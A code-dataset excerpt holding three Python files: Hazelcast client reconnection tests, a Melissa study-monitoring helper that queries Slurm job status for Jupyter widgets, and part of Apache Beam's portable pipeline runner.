source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
reconnect_test.py
|
import sys
import time
from threading import Thread, Event
from hazelcast import HazelcastClient
from hazelcast.errors import HazelcastError, TargetDisconnectedError
from hazelcast.lifecycle import LifecycleState
from hazelcast.util import AtomicInteger
from tests.base import HazelcastTestCase
from tests.util import event_collector
class ReconnectTest(HazelcastTestCase):
rc = None
def setUp(self):
self.rc = self.create_rc()
self.cluster = self.create_cluster(self.rc)
def tearDown(self):
self.shutdown_all_clients()
self.rc.exit()
def test_start_client_with_no_member(self):
with self.assertRaises(HazelcastError):
self.create_client(
{
"cluster_members": [
"127.0.0.1:5701",
"127.0.0.1:5702",
"127.0.0.1:5703",
],
"cluster_connect_timeout": 2,
}
)
def test_start_client_before_member(self):
def run():
time.sleep(1.0)
self.cluster.start_member()
t = Thread(target=run)
t.start()
self.create_client(
{
"cluster_name": self.cluster.id,
"cluster_connect_timeout": 5.0,
}
)
t.join()
def test_restart_member(self):
member = self.cluster.start_member()
client = self.create_client(
{
"cluster_name": self.cluster.id,
"cluster_connect_timeout": 5.0,
}
)
state = [None]
def listener(s):
state[0] = s
client.lifecycle_service.add_listener(listener)
member.shutdown()
self.assertTrueEventually(lambda: self.assertEqual(state[0], LifecycleState.DISCONNECTED))
self.cluster.start_member()
self.assertTrueEventually(lambda: self.assertEqual(state[0], LifecycleState.CONNECTED))
def test_listener_re_register(self):
member = self.cluster.start_member()
client = self.create_client(
{
"cluster_name": self.cluster.id,
"cluster_connect_timeout": 5.0,
}
)
map = client.get_map("map").blocking()
collector = event_collector()
reg_id = map.add_entry_listener(added_func=collector)
self.logger.info("Registered listener with id %s", reg_id)
member.shutdown()
self.cluster.start_member()
count = AtomicInteger()
def assert_events():
if client.lifecycle_service.is_running():
while True:
try:
map.put("key-%d" % count.get_and_increment(), "value")
break
except TargetDisconnectedError:
pass
self.assertGreater(len(collector.events), 0)
else:
self.fail("Client disconnected...")
self.assertTrueEventually(assert_events)
def test_member_list_after_reconnect(self):
old_member = self.cluster.start_member()
client = self.create_client(
{
"cluster_name": self.cluster.id,
"cluster_connect_timeout": 5.0,
}
)
old_member.shutdown()
new_member = self.cluster.start_member()
def assert_member_list():
members = client.cluster_service.get_members()
self.assertEqual(1, len(members))
self.assertEqual(new_member.uuid, str(members[0].uuid))
self.assertTrueEventually(assert_member_list)
def test_reconnect_toNewNode_ViaLastMemberList(self):
old_member = self.cluster.start_member()
client = self.create_client(
{
"cluster_name": self.cluster.id,
"cluster_members": [
"127.0.0.1:5701",
],
"smart_routing": False,
"cluster_connect_timeout": 10.0,
}
)
new_member = self.cluster.start_member()
old_member.shutdown()
def assert_member_list():
members = client.cluster_service.get_members()
self.assertEqual(1, len(members))
self.assertEqual(new_member.uuid, str(members[0].uuid))
self.assertTrueEventually(assert_member_list)
class ReconnectWithDifferentInterfacesTest(HazelcastTestCase):
def _create_cluster_config(self, public_address, heartbeat_seconds=300):
return """<?xml version="1.0" encoding="UTF-8"?>
<hazelcast xmlns="http://www.hazelcast.com/schema/config"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.hazelcast.com/schema/config
http://www.hazelcast.com/schema/config/hazelcast-config-4.0.xsd">
<network>
<public-address>%s</public-address>
</network>
<properties>
<property name="hazelcast.client.max.no.heartbeat.seconds">%d</property>
</properties>
</hazelcast>""" % (
public_address,
heartbeat_seconds,
)
def setUp(self):
self.rc = self.create_rc()
self.client = None
def tearDown(self):
if self.client:
# If the test is failed, and we couldn't shutdown
# the client, try to shutdown here to make sure that
# we are not going to affect other tests. If the client
# is already shutdown, then this is basically no-op.
self.client.shutdown()
self.rc.exit()
def test_connection_count_after_reconnect_with_member_hostname_client_ip(self):
self._verify_connection_count_after_reconnect("localhost", "127.0.0.1")
def test_connection_count_after_reconnect_with_member_hostname_client_hostname(self):
self._verify_connection_count_after_reconnect("localhost", "localhost")
def test_connection_count_after_reconnect_with_member_ip_client_ip(self):
self._verify_connection_count_after_reconnect("127.0.0.1", "127.0.0.1")
def test_connection_count_after_reconnect_with_member_ip_client_hostname(self):
self._verify_connection_count_after_reconnect("127.0.0.1", "localhost")
def test_listeners_after_client_disconnected_with_member_hostname_client_ip(self):
self._verify_listeners_after_client_disconnected("localhost", "127.0.0.1")
def test_listeners_after_client_disconnected_with_member_hostname_client_hostname(self):
self._verify_listeners_after_client_disconnected("localhost", "localhost")
def test_listeners_after_client_disconnected_with_member_ip_client_ip(self):
self._verify_listeners_after_client_disconnected("127.0.0.1", "127.0.0.1")
def test_listeners_after_client_disconnected_with_member_ip_client_hostname(self):
self._verify_listeners_after_client_disconnected("127.0.0.1", "localhost")
def _verify_connection_count_after_reconnect(self, member_address, client_address):
cluster = self.create_cluster(self.rc, self._create_cluster_config(member_address))
member = cluster.start_member()
disconnected = Event()
reconnected = Event()
def listener(state):
if state == "DISCONNECTED":
disconnected.set()
if state == "CONNECTED" and disconnected.is_set():
reconnected.set()
client = HazelcastClient(
cluster_name=cluster.id,
cluster_members=[client_address],
cluster_connect_timeout=sys.maxsize,
lifecycle_listeners=[listener],
)
self.client = client
self.assertTrueEventually(
lambda: self.assertEqual(1, len(client._connection_manager.active_connections))
)
member.shutdown()
self.assertTrueEventually(lambda: self.assertTrue(disconnected.is_set()))
cluster.start_member()
self.assertTrueEventually(lambda: self.assertTrue(reconnected.is_set()))
self.assertEqual(1, len(client._connection_manager.active_connections))
client.shutdown()
self.rc.terminateCluster(cluster.id)
def _verify_listeners_after_client_disconnected(self, member_address, client_address):
heartbeat_seconds = 2
cluster = self.create_cluster(
self.rc, self._create_cluster_config(member_address, heartbeat_seconds)
)
member = cluster.start_member()
client = HazelcastClient(
cluster_name=cluster.id,
cluster_members=[client_address],
cluster_connect_timeout=sys.maxsize,
)
self.client = client
test_map = client.get_map("test").blocking()
event_count = AtomicInteger()
test_map.add_entry_listener(
added_func=lambda _: event_count.get_and_increment(), include_value=False
)
self.assertTrueEventually(
lambda: self.assertEqual(1, len(client._connection_manager.active_connections))
)
member.shutdown()
time.sleep(2 * heartbeat_seconds)
cluster.start_member()
def assertion():
test_map.remove(1)
test_map.put(1, 2)
self.assertNotEqual(0, event_count.get())
self.assertTrueEventually(assertion)
client.shutdown()
self.rc.terminateCluster(cluster.id)
|
main.py
|
from threading import Thread
from collections import Counter, OrderedDict
import subprocess
import time, datetime
import statistics
from IPython.display import display
import ipywidgets as widgets
import matplotlib
from launcher.study import Study
import sys
sys.path.append('/home/docker/melissa/melissa')
sys.path.append('/home/docker/melissa/melissa/install-oardocker/share/melissa/launcher')
import job_scheduler_config
class MelissaMonitoring:
def __init__(self, study_options, melissa_stats, user_functions):
self.study = Study(study_options, melissa_stats, user_functions)
self.jobStates = {-1:'Not submitted', 0:'Waiting', 1:'Running', 2:'Finished', 4:'Timeout'}
self.timeStart = None
self.timeStop = None
self.thread = None
self.state_checker = None
self.jobRestartThreshold = 3
self.coreUsageData = None
self.sobolConfidenceInterval = None
self.timeWidget = None
self.serverStatusWidget = None
self.failedParametersWidget = None
self.jobsCPUCountWidget = None
self.scheduler = job_scheduler_config.scheduler
def startStudyInThread(self):
"""Starts study with options from the constructor
Returns:
Thread -- Thread object used to control the study
"""
self.coreUsageData = OrderedDict()
self.thread = Thread(target=self.study.run)
self.thread.start()
self.timeStart = datetime.datetime.now()
return self.thread
def waitForInitialization(self):
"""Waits for melissa server to fully initialize
"""
while self.study.threads.get('state_checker', None) is None:
time.sleep(0.001)
else:
self.state_checker = self.study.threads['state_checker']
while not self.state_checker.is_alive():
time.sleep(0.001)
def isStudyRunning(self):
"""Checks if study is still running
Returns:
Bool -- Is study still running?
"""
return self.state_checker.running_study if self.state_checker.is_alive() else False
def getJobStatusData(self):
"""Get dictionary with current number of jobs with particular job status
Returns:
Dictionary -- Mapped as jobStatus -> numberOfJobs
"""
data = dict(Counter(map(lambda x: x.job_status, self.study.groups)))
return {self.jobStates[statusCode]: value for statusCode, value in data.items()}
def getServerStatusData(self):
"""Get server job status
Returns:
string -- Server job status
"""
return self.jobStates[self.study.server_obj[0].status]
def getCPUCount(self): ## TODO: remove
"""Get the number of user's current total CPU usage. Slurm specific
Returns:
int -- number of CPU's in usage
"""
ids = self.getJobsIDs()
process = subprocess.Popen('squeue -h -o "%C" -j {} -t RUNNING'.format(",".join(ids)),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True,
universal_newlines=True)
out, _ = process.communicate()
return sum([int(x) for x in list(out.splitlines())])
def getJobCPUCount(self, ID): ## TODO: remove
"""Get CPU usage of particular job. Slurm specific
Arguments:
ID {str} -- id of the job
Returns:
str -- CPU usage of the job
"""
process = subprocess.Popen('squeue -h -o "%C" -j {} -t RUNNING'.format(ID),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True,
universal_newlines=True)
out, _ = process.communicate()
return str(out).strip()
def getJobsCPUCount(self): ## TODO: remove
"""Get the current CPU usage of your jobs. Slurm specific
Returns:
Dict[str,str] -- Mapped as name_of_the_job -> CPU_usage
"""
ids = self.getJobsIDs()
process = subprocess.Popen('squeue -h -o "%j %C" -j {} -t RUNNING'.format(",".join(ids)),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True,
universal_newlines=True)
out, _ = process.communicate()
return dict(map(lambda x: tuple(x.split(' ')), out.splitlines()))
def getRemainingJobsTime(self): ## TODO: remove
"""Get the current remaining time of your jobs. Slurm specific
Returns:
Dict[str,str] -- Mapped as name_of_the_job -> remaining_time
"""
ids = self.getJobsIDs()
process = subprocess.Popen('squeue -h -o "%j %L" -j {} -t RUNNING'.format(",".join(ids)),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True,
universal_newlines=True)
out, _ = process.communicate()
return dict(map(lambda x: tuple(x.split(' ')), out.splitlines()))
def getJobsIDs(self, include_server = True):
"""Get the list of jobs ids'
Keyword Arguments:
include_server {bool} -- Include server ID in the list (default: {True})
Returns:
List[str] -- List of jobs ids'
"""
data = list(map(lambda x: str(x.job_id), self.study.groups))
if include_server:
data.append(str(self.study.server_obj[0].job_id))
return data
def getServerID(self):
"""Get server ID
Returns:
str -- server ID
"""
return str(self.study.server_obj[0].job_id)
def getFailedParametersList(self):
"""Get list of failed parameters in the study
Returns:
list -- nested list of failed parameters
"""
data = filter(lambda x: x.nb_restarts > self.jobRestartThreshold ,self.study.groups)
return list(map(lambda x: x.param_set, data))
def getSobolConfidenceInterval(self):
"""Get current sobol confidence interval
If Sobol Indicies wasn't selected in the options file, function will always return None.
Returns:
float -- real number between 1 and 2
or
None -- if confidence interval couldn't be calculated at the moment
"""
return self.study.threads['messenger'].confidence_interval.get('Sobol', None)
def plotCoresUsage(self, ax):
"""Automatically plot cores usage as time series
Arguments:
ax {matplotlib.axes} -- Axes object that should be plotted
"""
ax.clear()
self.coreUsageData[datetime.datetime.now() - self.timeStart] = self.scheduler.getTotalCPUCount(self.getJobsIDs())
ax.plot(list(map(lambda x: str(x), self.coreUsageData.keys())), list(self.coreUsageData.values()))
ax.set_title('Cores usage vs time')
ax.get_figure().autofmt_xdate()
def plotJobStatus(self, ax):
"""Automatically plot job statuses as pie chart
Arguments:
ax {matplotlib.axes} -- Axes object that should be plotted
"""
jobStatusData = self.getJobStatusData()
ax.clear()
sumOfJobs = sum(jobStatusData.values())
sizes = [x/sumOfJobs*100 for x in jobStatusData.values()]
labels = [x for x in jobStatusData.keys()]
ax.pie(sizes, labels=labels, autopct='%1.1f%%', startangle=90)
ax.set_title('Job statuses')
def plotSobolConfidenceInterval(self, ax):
"""Automatically plot cores usage as time series.
If Sobol Indicies wasn't selected in the options file, nothing will be plotted.
Arguments:
ax {matplotlib.axes} -- Axes object that should be plotted
"""
data = self.getSobolConfidenceInterval()
if data is not None:
ax.clear()
self.sobolConfidenceInterval[datetime.datetime.now() - self.timeStart] = data
ax.plot(list(map(lambda x: str(x), self.sobolConfidenceInterval.keys())), list(self.sobolConfidenceInterval.values()))
ax.set_title('Sobol confidence interval')
ax.get_figure().autofmt_xdate()
def _createJobsCPUCountWidget(self):
"""Create jobs cpu count widget, used by showJobsCPUCount & MelissaDash
Returns:
widgets.HTML -- customed widget for showing Jobs remaining time
"""
style = {'description_width': 'initial'}
self.jobsCPUCountWidget = widgets.HTML(value="",
description='Jobs CPU count: ',
style=style,
)
return self.jobsCPUCountWidget
def showJobsCPUCount(self):
"""Create widget (if not created) & show jobs cpu count of your jobs on cluster
"""
if self.jobsCPUCountWidget is None:
self._createJobsCPUCountWidget()
display(self.jobsCPUCountWidget)
data = self.scheduler.getCPUCountByJob(self.getJobsIDs())
data = ['{} - {}'.format(k,v) for k,v in data.items()]
value = '<br/>'.join(data)
self.jobsCPUCountWidget.value = value
def _createRemainingJobsTimeWidget(self):
"""Create remaining time widget, used by showRemainingJobsTime & MelissaDash
Returns:
widgets.HTML -- customed widget for showing Jobs remaining time
"""
style = {'description_width': 'initial'}
self.timeWidget = widgets.HTML(value="",
description='Remaining job time: ',
style=style,
)
return self.timeWidget
def showRemainingJobsTime(self):
"""Create widget (if not created) & show remaining time of your jobs on cluster
"""
if self.timeWidget is None:
self._createRemainingJobsTimeWidget()
display(self.timeWidget)
data = self.scheduler.getRemainingJobsTime(self.getJobsIDs())
data = ['{} - {}'.format(k,v) for k,v in data.items()]
value = '<br/>'.join(data)
self.timeWidget.value = value
def _createServerStatusWidget(self):
"""Create server status widget, used by showServerStatus & MelissaDash
Returns:
widgets.HTML -- customed widget for showing server status
"""
style = {'description_width': 'initial'}
self.serverStatusWidget = widgets.HTML(value="",
description='Server status: ',
style=style,
)
return self.serverStatusWidget
def showServerStatus(self):
"""Create widget (if not created) & show the status of the Melissa server
"""
if self.serverStatusWidget is None:
self._createServerStatusWidget()
display(self.serverStatusWidget)
self.serverStatusWidget.value = self.getServerStatusData()
def _createFailedParametersWidget(self):
"""Create failed parameters widget, used by showServerStatus & MelissaDash
Returns:
widgets.HTML -- customed widget for showing failed parameters
"""
style = {'description_width': 'initial'}
self.failedParametersWidget = widgets.HTML(value="",
description='Failed parameters: ',
style=style,
)
return self.failedParametersWidget
def showFailedParameters(self):
"""Create widget (if not created) & show simulations' failed parameters
"""
if self.failedParametersWidget is None:
self._createFailedParametersWidget()
display(self.failedParametersWidget)
data = self.getFailedParametersList()
value = '<br/>'.join(map(lambda x: str(x), data))
self.failedParametersWidget.value = value
def cleanUp(self):
"""Clean up after study
"""
self.thread.join()
self.timeStop = datetime.datetime.now()
self.thread = None
self.state_checker = None
if self.timeWidget is not None:
self.timeWidget.close()
self.timeWidget = None
if self.serverStatusWidget is not None:
self.serverStatusWidget.close()
self.serverStatusWidget = None
if self.failedParametersWidget is not None:
self.failedParametersWidget.close()
self.failedParametersWidget = None
if self.jobsCPUCountWidget is not None:
self.jobsCPUCountWidget.close()
self.jobsCPUCountWidget = None
def getStudyInfo(self):
"""Get info about performed study such as time and cores used
Returns:
str -- info about study
"""
info = """
Study started: {}
Study ended: {}
Elapsed time: {}
Max cores used: {}
Avg cores used: {}
""".format(self.timeStart, self.timeStop, self.timeStop - self.timeStart,
max(list(self.coreUsageData.values())), statistics.mean(list(self.coreUsageData.values())))
return info
|
portable_runner.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pytype: skip-file
# mypy: check-untyped-defs
import atexit
import functools
import itertools
import logging
import threading
import time
from typing import TYPE_CHECKING
from typing import Any
from typing import Dict
from typing import Iterator
from typing import Optional
from typing import Tuple
import grpc
from apache_beam.metrics import metric
from apache_beam.metrics.execution import MetricResult
from apache_beam.options.pipeline_options import DebugOptions
from apache_beam.options.pipeline_options import PortableOptions
from apache_beam.options.pipeline_options import SetupOptions
from apache_beam.options.pipeline_options import StandardOptions
from apache_beam.options.value_provider import ValueProvider
from apache_beam.portability import common_urns
from apache_beam.portability.api import beam_artifact_api_pb2_grpc
from apache_beam.portability.api import beam_job_api_pb2
from apache_beam.runners import runner
from apache_beam.runners.job import utils as job_utils
from apache_beam.runners.portability import artifact_service
from apache_beam.runners.portability import job_server
from apache_beam.runners.portability import portable_metrics
from apache_beam.runners.portability.fn_api_runner.fn_runner import translations
from apache_beam.runners.worker import sdk_worker_main
from apache_beam.runners.worker import worker_pool_main
from apache_beam.transforms import environments
if TYPE_CHECKING:
from google.protobuf import struct_pb2 # pylint: disable=ungrouped-imports
from apache_beam.options.pipeline_options import PipelineOptions
from apache_beam.pipeline import Pipeline
from apache_beam.portability.api import beam_runner_api_pb2
__all__ = ['PortableRunner']
MESSAGE_LOG_LEVELS = {
beam_job_api_pb2.JobMessage.MESSAGE_IMPORTANCE_UNSPECIFIED: logging.INFO,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_DEBUG: logging.DEBUG,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_DETAILED: logging.DEBUG,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_BASIC: logging.INFO,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_WARNING: logging.WARNING,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR: logging.ERROR,
}
TERMINAL_STATES = [
beam_job_api_pb2.JobState.DONE,
beam_job_api_pb2.JobState.DRAINED,
beam_job_api_pb2.JobState.FAILED,
beam_job_api_pb2.JobState.CANCELLED,
]
ENV_TYPE_ALIASES = {'LOOPBACK': 'EXTERNAL'}
_LOGGER = logging.getLogger(__name__)
class JobServiceHandle(object):
"""
Encapsulates the interactions necessary to submit a pipeline to a job service.
The base set of interactions consists of 3 steps:
- prepare
- stage
- run
"""
def __init__(self, job_service, options, retain_unknown_options=False):
self.job_service = job_service
self.options = options
self.timeout = options.view_as(PortableOptions).job_server_timeout
self.artifact_endpoint = options.view_as(PortableOptions).artifact_endpoint
self._retain_unknown_options = retain_unknown_options
def submit(self, proto_pipeline):
# type: (beam_runner_api_pb2.Pipeline) -> Tuple[str, Iterator[beam_job_api_pb2.JobStateEvent], Iterator[beam_job_api_pb2.JobMessagesResponse]]
"""
Submit and run the pipeline defined by `proto_pipeline`.
"""
prepare_response = self.prepare(proto_pipeline)
artifact_endpoint = (
self.artifact_endpoint or
prepare_response.artifact_staging_endpoint.url)
self.stage(
proto_pipeline,
artifact_endpoint,
prepare_response.staging_session_token)
return self.run(prepare_response.preparation_id)
def get_pipeline_options(self):
# type: () -> struct_pb2.Struct
"""
Get `self.options` as a protobuf Struct
"""
# fetch runner options from job service
# retries in case the channel is not ready
def send_options_request(max_retries=5):
num_retries = 0
while True:
try:
# This reports channel is READY but connections may fail
# Seems to be only an issue on Mac with port forwardings
return self.job_service.DescribePipelineOptions(
beam_job_api_pb2.DescribePipelineOptionsRequest(),
timeout=self.timeout)
except grpc.FutureTimeoutError:
# no retry for timeout errors
raise
except grpc.RpcError as e:
num_retries += 1
if num_retries > max_retries:
raise e
time.sleep(1)
options_response = send_options_request()
def add_runner_options(parser):
for option in options_response.options:
try:
# no default values - we don't want runner options
# added unless they were specified by the user
add_arg_args = {'action': 'store', 'help': option.description}
if option.type == beam_job_api_pb2.PipelineOptionType.BOOLEAN:
add_arg_args['action'] = 'store_true' \
if option.default_value != 'true' else 'store_false'
elif option.type == beam_job_api_pb2.PipelineOptionType.INTEGER:
add_arg_args['type'] = int
elif option.type == beam_job_api_pb2.PipelineOptionType.ARRAY:
add_arg_args['action'] = 'append'
parser.add_argument("--%s" % option.name, **add_arg_args)
except Exception as e:
# ignore runner options that are already present
# only in this case is duplicate not treated as error
if 'conflicting option string' not in str(e):
raise
_LOGGER.debug("Runner option '%s' was already added" % option.name)
all_options = self.options.get_all_options(
add_extra_args_fn=add_runner_options,
retain_unknown_options=self._retain_unknown_options)
return self.encode_pipeline_options(all_options)
@staticmethod
def encode_pipeline_options(
all_options: Dict[str, Any]) -> 'struct_pb2.Struct':
def convert_pipeline_option_value(v):
# convert int values: BEAM-5509
if type(v) == int:
return str(v)
elif isinstance(v, ValueProvider):
return convert_pipeline_option_value(
v.get()) if v.is_accessible() else None
return v
# TODO: Define URNs for options.
p_options = {
'beam:option:' + k + ':v1': convert_pipeline_option_value(v)
for k,
v in all_options.items() if v is not None
}
return job_utils.dict_to_struct(p_options)
def prepare(self, proto_pipeline):
# type: (beam_runner_api_pb2.Pipeline) -> beam_job_api_pb2.PrepareJobResponse
"""Prepare the job on the job service"""
return self.job_service.Prepare(
beam_job_api_pb2.PrepareJobRequest(
job_name='job',
pipeline=proto_pipeline,
pipeline_options=self.get_pipeline_options()),
timeout=self.timeout)
def stage(self,
proto_pipeline, # type: beam_runner_api_pb2.Pipeline
artifact_staging_endpoint,
staging_session_token
):
# type: (...) -> None
"""Stage artifacts"""
if artifact_staging_endpoint:
artifact_service.offer_artifacts(
beam_artifact_api_pb2_grpc.ArtifactStagingServiceStub(
channel=grpc.insecure_channel(artifact_staging_endpoint)),
artifact_service.ArtifactRetrievalService(
artifact_service.BeamFilesystemHandler(None).file_reader),
staging_session_token)
def run(self, preparation_id):
# type: (str) -> Tuple[str, Iterator[beam_job_api_pb2.JobStateEvent], Iterator[beam_job_api_pb2.JobMessagesResponse]]
"""Run the job"""
try:
state_stream = self.job_service.GetStateStream(
beam_job_api_pb2.GetJobStateRequest(job_id=preparation_id),
timeout=self.timeout)
# If there's an error, we don't always get it until we try to read.
# Fortunately, there's always an immediate current state published.
state_stream = itertools.chain([next(state_stream)], state_stream)
message_stream = self.job_service.GetMessageStream(
beam_job_api_pb2.JobMessagesRequest(job_id=preparation_id),
timeout=self.timeout)
except Exception:
# TODO(BEAM-6442): Unify preparation_id and job_id for all runners.
state_stream = message_stream = None
# Run the job and wait for a result, we don't set a timeout here because
# it may take a long time for a job to complete and streaming
# jobs currently never return a response.
run_response = self.job_service.Run(
beam_job_api_pb2.RunJobRequest(preparation_id=preparation_id))
if state_stream is None:
state_stream = self.job_service.GetStateStream(
beam_job_api_pb2.GetJobStateRequest(job_id=run_response.job_id))
message_stream = self.job_service.GetMessageStream(
beam_job_api_pb2.JobMessagesRequest(job_id=run_response.job_id))
return run_response.job_id, message_stream, state_stream
class PortableRunner(runner.PipelineRunner):
"""
Experimental: No backward compatibility guaranteed.
A BeamRunner that executes Python pipelines via the Beam Job API.
This runner is a stub and does not run the actual job.
This runner schedules the job on a job service. The responsibility of
running and managing the job lies with the job service used.
"""
def __init__(self):
self._dockerized_job_server = None # type: Optional[job_server.JobServer]
@staticmethod
def _create_environment(options):
# type: (PipelineOptions) -> environments.Environment
portable_options = options.view_as(PortableOptions)
# Do not set a Runner. Otherwise this can cause problems in Java's
# PipelineOptions, i.e. ClassNotFoundException, if the corresponding Runner
# does not exist in the Java SDK. In portability, the entry point is clearly
# defined via the JobService.
portable_options.view_as(StandardOptions).runner = None
environment_type = portable_options.environment_type
if not environment_type:
environment_urn = common_urns.environments.DOCKER.urn
elif environment_type.startswith('beam:env:'):
environment_urn = environment_type
else:
# e.g. handle LOOPBACK -> EXTERNAL
environment_type = ENV_TYPE_ALIASES.get(
environment_type, environment_type)
try:
environment_urn = getattr(
common_urns.environments, environment_type).urn
except AttributeError:
raise ValueError('Unknown environment type: %s' % environment_type)
env_class = environments.Environment.get_env_cls_from_urn(environment_urn)
return env_class.from_options(portable_options)
def default_job_server(self, options):
raise NotImplementedError(
'You must specify a --job_endpoint when using --runner=PortableRunner. '
'Alternatively, you may specify which portable runner you intend to '
'use, such as --runner=FlinkRunner or --runner=SparkRunner.')
def create_job_service_handle(self, job_service, options):
# type: (...) -> JobServiceHandle
return JobServiceHandle(job_service, options)
def create_job_service(self, options):
# type: (PipelineOptions) -> JobServiceHandle
"""
Start the job service and return a `JobServiceHandle`
"""
job_endpoint = options.view_as(PortableOptions).job_endpoint
if job_endpoint:
if job_endpoint == 'embed':
server = job_server.EmbeddedJobServer() # type: job_server.JobServer
else:
job_server_timeout = options.view_as(PortableOptions).job_server_timeout
server = job_server.ExternalJobServer(job_endpoint, job_server_timeout)
else:
server = self.default_job_server(options)
return self.create_job_service_handle(server.start(), options)
@staticmethod
def get_proto_pipeline(pipeline, options):
# type: (Pipeline, PipelineOptions) -> beam_runner_api_pb2.Pipeline
portable_options = options.view_as(PortableOptions)
proto_pipeline = pipeline.to_runner_api(
default_environment=PortableRunner._create_environment(
portable_options))
# TODO: https://issues.apache.org/jira/browse/BEAM-7199
# Eventually remove the 'pre_optimize' option alltogether and only perform
# the equivalent of the 'default' case below (minus the 'lift_combiners'
# part).
pre_optimize = options.view_as(DebugOptions).lookup_experiment(
'pre_optimize', 'default').lower()
if (not options.view_as(StandardOptions).streaming and
pre_optimize != 'none'):
if pre_optimize == 'default':
phases = [
# TODO: https://issues.apache.org/jira/browse/BEAM-4678
# https://issues.apache.org/jira/browse/BEAM-11478
# Eventually remove the 'lift_combiners' phase from 'default'.
translations.pack_combiners,
translations.lift_combiners,
translations.sort_stages
]
partial = True
elif pre_optimize == 'all':
phases = [
translations.annotate_downstream_side_inputs,
translations.annotate_stateful_dofns_as_roots,
translations.fix_side_input_pcoll_coders,
translations.pack_combiners,
translations.lift_combiners,
translations.expand_sdf,
translations.fix_flatten_coders,
# translations.sink_flattens,
translations.greedily_fuse,
translations.read_to_impulse,
translations.extract_impulse_stages,
translations.remove_data_plane_ops,
translations.sort_stages
]
partial = False
elif pre_optimize == 'all_except_fusion':
# TODO(BEAM-7248): Delete this branch after PortableRunner supports
# beam:runner:executable_stage:v1.
phases = [
translations.annotate_downstream_side_inputs,
translations.annotate_stateful_dofns_as_roots,
translations.fix_side_input_pcoll_coders,
translations.pack_combiners,
translations.lift_combiners,
translations.expand_sdf,
translations.fix_flatten_coders,
# translations.sink_flattens,
# translations.greedily_fuse,
translations.read_to_impulse,
translations.extract_impulse_stages,
translations.remove_data_plane_ops,
translations.sort_stages
]
partial = True
else:
phases = []
for phase_name in pre_optimize.split(','):
# For now, these are all we allow.
if phase_name in ('pack_combiners', 'lift_combiners'):
phases.append(getattr(translations, phase_name))
else:
raise ValueError(
'Unknown or inapplicable phase for pre_optimize: %s' %
phase_name)
phases.append(translations.sort_stages)
partial = True
# All (known) portable runners (ie Flink and Spark) support these URNs.
known_urns = frozenset([
common_urns.composites.RESHUFFLE.urn,
common_urns.primitives.IMPULSE.urn,
common_urns.primitives.FLATTEN.urn,
common_urns.primitives.GROUP_BY_KEY.urn
])
proto_pipeline = translations.optimize_pipeline(
proto_pipeline,
phases=phases,
known_runner_urns=known_urns,
partial=partial)
return proto_pipeline
def run_pipeline(self, pipeline, options):
# type: (Pipeline, PipelineOptions) -> PipelineResult
portable_options = options.view_as(PortableOptions)
# TODO: https://issues.apache.org/jira/browse/BEAM-5525
# portable runner specific default
if options.view_as(SetupOptions).sdk_location == 'default':
options.view_as(SetupOptions).sdk_location = 'container'
experiments = options.view_as(DebugOptions).experiments or []
# This is needed as we start a worker server if one is requested
# but none is provided.
if portable_options.environment_type == 'LOOPBACK':
use_loopback_process_worker = options.view_as(
DebugOptions).lookup_experiment('use_loopback_process_worker', False)
portable_options.environment_config, server = (
worker_pool_main.BeamFnExternalWorkerPoolServicer.start(
state_cache_size=
sdk_worker_main._get_state_cache_size(experiments),
data_buffer_time_limit_ms=
sdk_worker_main._get_data_buffer_time_limit_ms(experiments),
use_process=use_loopback_process_worker))
cleanup_callbacks = [functools.partial(server.stop, 1)]
else:
cleanup_callbacks = []
proto_pipeline = self.get_proto_pipeline(pipeline, options)
job_service_handle = self.create_job_service(options)
job_id, message_stream, state_stream = \
job_service_handle.submit(proto_pipeline)
result = PipelineResult(
job_service_handle.job_service,
job_id,
message_stream,
state_stream,
cleanup_callbacks)
if cleanup_callbacks:
# Register an exit handler to ensure cleanup on exit.
atexit.register(functools.partial(result._cleanup, on_exit=True))
_LOGGER.info(
'Environment "%s" has started a component necessary for the '
'execution. Be sure to run the pipeline using\n'
' with Pipeline() as p:\n'
' p.apply(..)\n'
'This ensures that the pipeline finishes before this program exits.',
portable_options.environment_type)
return result
class PortableMetrics(metric.MetricResults):
def __init__(self, job_metrics_response):
metrics = job_metrics_response.metrics
self.attempted = portable_metrics.from_monitoring_infos(metrics.attempted)
self.committed = portable_metrics.from_monitoring_infos(metrics.committed)
@staticmethod
def _combine(committed, attempted, filter):
all_keys = set(committed.keys()) | set(attempted.keys())
return [
MetricResult(key, committed.get(key), attempted.get(key))
for key in all_keys if metric.MetricResults.matches(filter, key)
]
def query(self, filter=None):
counters, distributions, gauges = [
self._combine(x, y, filter)
for x, y in zip(self.committed, self.attempted)
]
return {
self.COUNTERS: counters,
self.DISTRIBUTIONS: distributions,
self.GAUGES: gauges
}
class PipelineResult(runner.PipelineResult):
def __init__(
self,
job_service,
job_id,
message_stream,
state_stream,
cleanup_callbacks=()):
super().__init__(beam_job_api_pb2.JobState.UNSPECIFIED)
self._job_service = job_service
self._job_id = job_id
self._messages = []
self._message_stream = message_stream
self._state_stream = state_stream
self._cleanup_callbacks = cleanup_callbacks
self._metrics = None
self._runtime_exception = None
def cancel(self):
# type: () -> None
try:
self._job_service.Cancel(
beam_job_api_pb2.CancelJobRequest(job_id=self._job_id))
finally:
self._cleanup()
@property
def state(self):
runner_api_state = self._job_service.GetState(
beam_job_api_pb2.GetJobStateRequest(job_id=self._job_id)).state
self._state = self._runner_api_state_to_pipeline_state(runner_api_state)
return self._state
